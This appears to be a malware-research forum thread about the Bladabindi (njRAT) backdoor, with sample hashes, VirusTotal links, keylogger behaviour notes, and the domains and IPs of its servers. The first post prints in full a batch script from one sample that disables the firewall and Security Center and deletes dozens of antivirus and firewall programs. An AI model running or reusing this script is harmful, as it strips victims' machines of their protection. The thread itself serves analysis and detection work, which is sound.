[EP_X0FF]

MMPC description http://www.microsoft.com/security/porta ... adabindi.G

SHA256: e2dee10881ceafddf3fc8fbe16c4fc1b14898c52e34b985cd7b0ef7b531e38df
SHA1: 5af0c48c88da182d337c60c0ba1f0dd067c93df6
MD5: 4f80ed5be19fdf11d1fb27240640ba40

https://www.virustotal.com/en/file/e2de ... 369879627/

script-kiddie trash

batch included

Code: Select all

echo offnet stop “Security Center”netsh firewall set opmode mode=disabledel E-*del av*del fire*del anti*del spy*del bullguarddel PersFwdel KAV*del UfseAgnt*del Spy*del ZONEALARMdel SAFE***del OUTPOST*del nv*del nav*del F-*del cle*del BLACKICEdel def*del kav*del avg*del ash*del aswupdsvdel ewid*del guard*del guar*del gcasDt*del msmp*del mcafe*del mghtmldel msiexecdel *safe*del zap*del zauinstdel upd*del zlclien*del minilogdel cc*del norton*del norton au*del ccc*del npfmn*del loge*del nisum*del issvcdel tmp*del tmn*del pcc*del cpd*del pop*del pav*del padmindel panda*del avsch*del sche*del syman*del *virus*del realm*del sweep*del scan*del ad-*del safe*del avas*del norm*del offg*del /Q /F %ProgramFiles%\alwils~1\avast4\*.*del /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\******del /Q /F %ProgramFiles%\kasper~1\******del /Q /F %ProgramFiles%\trojan~1\******del /Q /F %ProgramFiles%\f-prot95\*.*del /Q /F %ProgramFiles%\tbav\*.datdel /Q /F %ProgramFiles%\avpersonal\*.*del /Q /F %ProgramFiles%\Norton~1\*.*del /Q /F %ProgramFiles%\Mcafee\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*del /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*del /Q /F %ProgramFiles%\Norton~1\*.*del /Q /F %ProgramFiles%\avgamsr\******del /Q /F %ProgramFiles%\avgamsvr\******del /Q /F %ProgramFiles%\avgemc\******del /Q /F %ProgramFiles%\avgcc\******del /Q /F %ProgramFiles%\avgupsvc\******del /Q /F %ProgramFiles%\grisoftdel /Q /F %ProgramFiles%\nood32krn\******del /Q /F %ProgramFiles%\nood32\******del /Q /F %ProgramFiles%\nod32\******del /Q /F %ProgramFiles%\nood32\******del /Q /F %ProgramFiles%\kav\******del /Q /F %ProgramFiles%\kavmm\******del /Q /F %ProgramFiles%\kaspersky\*.*del /Q /F %ProgramFiles%\ewidoctrl\******del /Q /F %ProgramFiles%\guard\******del /Q /F %ProgramFiles%\ewido\******del /Q /F %ProgramFiles%\pavprsrv\******del /Q /F %ProgramFiles%\pavprot\******del /Q /F %ProgramFiles%\avengine\******del /Q /F %ProgramFiles%\apvxdwin\******del /Q /F %ProgramFiles%\avira\******del /Q /F %ProgramFiles%\panda software

[rough_spear]

Hi All,

This malware has an excellent capability of key logging.After execution it drops file java.exe in %temp%

and created java.exe.tmp file where it actually stores all the key strokes from user.

MD5 - 30E363C63AB1BA3BA87AD281E31CA223

VT link - https://www.virustotal.com/en/file/ed87 ... /analysis/

Regards,

rough_spear. ;)

[rough_spear]

Hi All,

One more sample file of this malware.

MD5 - BD1D660819EE54457794F31B8AB1FDE2

VT link - https://www.virustotal.com/en/file/4128 ... 376738064/

Regards,

rough_spear. ;)

[rough_spear]

It seems that Bladabindi is on the prowl, one more sample.

MD5 - A47C6E1861C6935CA98185C8D5C3795A

VT link - https://www.virustotal.com/en/file/0273 ... 376742132/

Regards,

rough_spear. ;)

[hx1997]

8x Backdoor:MSIL/Bladabindi

[TwinHeadedEagle]

Backdoor:MSIL/Bladabindi.AA

Dropper

https://www.virustotal.com/en/file/f35a ... /analysis/

[TwinHeadedEagle]

Another dropper, very low detection

https://www.virustotal.com/en/file/99ea ... /analysis/

[Xylitol]

https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.

[patriq]

https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.

Thats pretty funny.

Fuck anti-VM, they just gonna start putting anti-"Xyl" detection soon. Lol. :D

Good stuff as usual man.


That java.exe sample was hosted at hxxp://silver13.net/
A few more samples from the same server, attached.
Low detection rates..still some MSIL .net crap

Code: Select all

sub.exe
560FFF8CCFA8AE563F00483659659F78

dex.exe
C5A4103DF0A10F19916CCCBB0E989D14	

doc.exe
3262D5E2855FEF2C9263A47DEE2AC3A5

(from VxVault)

thought that dex.exe (C5A4103DF0A10F19916CCCBB0E989D14) would be a Dexter sample, since you caught him on a POS machine before..but looks like "SecureDll.dll" loading into IE address space..I think its just formgrabber/keylogger ability. Anyone confirm?

probable spot where key strokes are stored

Code: Select all

HKEY_CURRENT_USER\Software\HelperSolutions Software
"%System%\strokes.log"

notes about the servers this "hacker" uses in this campaign:

Code: Select all

silver13.net.		158.58.173.181 - RIPE-ERX NL
silver13.no-ip.biz.	197.15.207.77  - Agence Tunisienne Internet

[rkhunter]

http://blogs.technet.com/b/mmpc/archive ... bindi.aspx